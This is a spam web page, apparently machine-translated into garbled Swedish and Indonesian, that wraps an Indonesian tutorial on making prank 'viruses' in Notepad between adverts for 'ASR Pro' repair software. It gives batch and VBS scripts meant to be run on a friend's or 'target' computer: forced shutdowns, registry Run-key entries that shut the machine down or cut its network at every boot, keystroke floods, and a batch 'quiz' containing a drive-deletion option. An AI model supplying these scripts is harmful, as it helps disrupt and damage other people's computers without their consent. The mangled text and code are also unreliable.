You are currently viewing Lösning För Membuat Spyware Dengan Notepad

Lösning För Membuat Spyware Dengan Notepad

Om du nästan alltid får Membuat Spyware Dengan pappersfel, är dagens artikel här för att hjälpa dig.

Snabb och enkel PC-reparation

  • 1. Ladda ner och installera ASR Pro
  • 2. Öppna programmet och klicka på "Skanna"
  • 3. Klicka på "Reparera" för att starta reparationsprocessen
  • Njut av en snabbare

    Siapa sih yang tidak takut dengan seed datorproblem? datorvirus terkena, maka besar kemungkinan hemdator kamu jadi tidak bisa digunakan. Apalagi jika komputer kamu kena salah satu dari 20 virus komputer paling berbahaya dunia di.Tamat sudah, antara harus beli komputer baru atau use ulang.

    Di balik seramnya serangan virus dator, maka berikan jalantikus kamu kumpulan script cyberpunk men membuat virus dator sederhana. Mau Biar Nggak? kelihatan pintar paddling nullr profesional gitu.simak 7 script ugg membuat virus sederhana dengan anteckningsblock.

    7 Membuat Virus Sederhana Hack Script

    Sudah tahu virus komputer itu berbahaya, kok JalanTikus bagikan cara membuat virusnya sih? Ya karena virus individuella yang JalanTikus bagikan ini kuma berisi skrivande av programvara sederhana yang akan mengacaukan fungsi tanpa computer merusak enhet atau membokorkan informasi yang American Dental Association di dalamnya. Jadi Aman David Kokok Untuk digunakan computer menjahili tema kamu.

    1. Membuat Stop

    Virusvirus kerja irriterar dator sederhana ini adalah dengan memaksa dator teman atau target jadi Avstängning. Untuk melakukannya, silakan buka Notepad, john copy paste code bawah di. Spara filen-nya nama dengan ForceShutdown.bat klasscertifikat fil-nya Arkivera alla.

    @Echo avmeddelande 2011 energiskatteavdrag . Jag tycker inte mycket om digshutdown -c "Fel! Datorn har gett upp!" -MED

    Snabb och enkel PC-reparation

    Körs din dator lite långsammare än den brukade? Kanske har du fått fler och fler popup-fönster, eller så verkar din internetanslutning lite fläckig. Oroa dig inte, det finns en lösning! ASR Pro är den revolutionerande nya programvaran som hjälper dig att fixa alla dessa irriterande Windows-problem med bara en knapptryckning. Med ASR Pro kommer din dator att fungera som ny på nolltid!

  • 1. Ladda ner och installera ASR Pro
  • 2. Öppna programmet och klicka på "Skanna"
  • 3. Klicka på "Reparera" för att starta reparationsprocessen

  • Untuk mengaktifkan contamination ini, kamu harus klicka bara två data kali pada-nya. Maca, Otomatis secara virusini akan berjalan.

    2. Paksa Setiap Kali Dengan Dinyalakan Stop

    berbeda sebelumnya antivirus, sederhana datorsystemvirus yang ini akan memaksa computer teman kamu untuk shutdown setiap kali dinyalakan. Ayts, jangan asal gunakan kontaminering ini kalo siap gak tanggung akibatnya ya!

    echo @echo off>c:windowshartell.batecho-dump>>c:windowshartell.batecho -r avstängning -c 88 -f>>c:windowshartell.batecho end>>c:windowshartell.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI Reg_sz /t /d c:windowshartell.bat /freg add i hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz C:windowshartell /d.bat /fecho Du har blivit hackad.PAUS

    Simpan svarar buatan kamu atas di dengan nama hampi semua. Jangan lupa ekstensi gunakan .beat you! Klicka på “Untuk Less Active”.

    3. Mematikan Internet Secara Permanent

    Saat berada di suatu online, jaringan pasti kesal dong jika American Dental Assoc. Ladda ner Orang Yang Malach? Bikin i will be Internet lemot karena bandwith berkurang cepat. Makanya, coba Internet matikan teman kamu menggunakan sederhana berikut, virusscenario:

    echo @echo off>c:windowswimn32.batecho-blast>>c:windowswimn32.batecho ipconfig/release_all>>c:windowswimn32.batecho end>>c:windowswimn32.batreg import hkey_local_machinesoftware microsoftwindowscurrentversionrun /v WINDOWsAPI Reg_sz /t /d c:windowswimn32.bat /freg integrera hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t /d reg_sz c:windowswimn32.bat /fecho Du har blivit hackad!PAUS

    Sepertibias, simpandengan nama hampir semua gunakan bob ekstensi.bat. Klicka sedan för att fylla i!

    4. Caps Lock

    Siapa yang tidak kesal jika American Dental Association or ngetik isinya huruf besar semua? Orang Yang minerima pesan dengan huruf besar semua jelas akan terganggu, merasa atau bahkan marah. Makanya, yuk är engin team kamu dengan membuat Caps tombol Lock-nya nyala terus menggunakan virus script sederhana berikut:

    Kopiera kombinerat med klistra in koden från detaljerna i anteckningsblocket, lämna den bara med kommandot ForceCapsLock.vbs och filen för typ nya All File. Tryck på flera kali buat mulai mengaktifkan sederhana datorsystemvirus ini.

    5. VirusAlai

    Siapa hur fungerar cuma anak muda kekinian doang yang bisa alay? Computer kamu juga bisa alay loh kalo pathogen terinspeksi power switch alay. Nej, Buat Membuat Virus Computer Jan Akan Membuat PC-tangentbord Jadi Alai, Kamu Bisa Gunakan Software Sama, Bericut:

    Kopiera Caranya och ämneskoden till höger anteckningsblock. Spara filen som ForceAlay.vbs och skriv ner hela filen.

    6. Orang Jelek Virus

    membuat spionware dengan notepad

    Dikatain itu jelek emang nyebelin. Kalo kuma sekali dua kali sih harushna masih bisa ditahan, tapi kalo terus-terusan ngatai gimana jelek koba? Nej, dengan kod di bawah ini, kamu bisa membuat sebuah antivirus privat sederhana yang akan memaksa computer target buat mengeluarkan wary bahwa ‘dia jelek’ tanpa heti.

    Ställ in wshShell meaningwscript.CreateObject(“WScript.Shell”)Dowscript.sleep 100wshshell.sendkeys “Muka Lu Jelek Kayak Lous dator“band

    Kopiera dessutom klistra in script sederhana di ke atas Notepad. Oh ia, kamu bisa bagian ganti varna merah dengan kata-kata sesuay selera, lalu dengan nama store VirusOrangJelek.vbs.

    7. Quiz Virus

    Semua orang suka kuis kalo apalagi Berhadiah. Tapi kamu bakal kesal deh pasti setiap kalo kali mau buka komputer, ternyata yang nongol adalah kuis. Ja det kan jag? Buat kamu yang mau isengin target notebook dengan kuis-kuis menyebalkan, coba kamu gunakan manus berikut:

    @Echo avNamnet är Kuis hari ini!:MenyklassificeraEcho Jika kamu kena hsv apa yang kamu pilih lakukan?Ha sönderEko av Yang Mang:echo 1. MorgondatorEcho 2. aja-formatEcho 3. NangisEcho 4. Beli Computer BarEnter = installera ingetset /p input=välj:om %input%==1 -h stoppa -ttrettioom %input%==2 bli av med c:xxxom %input%==3 @ECHO är utan frågor inaktiveradmsg * Camu gelémjölmeddelande * Ngacha dulu gih!msg * Hayo läser, CPU läser gw acak-acak ya4. Ouda pinnar, installera oolang ajamsg mau kelar kan [email protected] av:ovanSTART %SystemRoot%system32notepad.exeGå upp

    Kopiera och lägg anteckningsboken med ViruzQuiz nama.bat. Selesai, tinggal jalankan buat mengujinya.

    Agar berjalan lancar, coba simpan fil virus dator sederhana yang kamu men datorer i fokus. Lalu letakkan report tersebut di hemdator, john jangan lupa ubah icon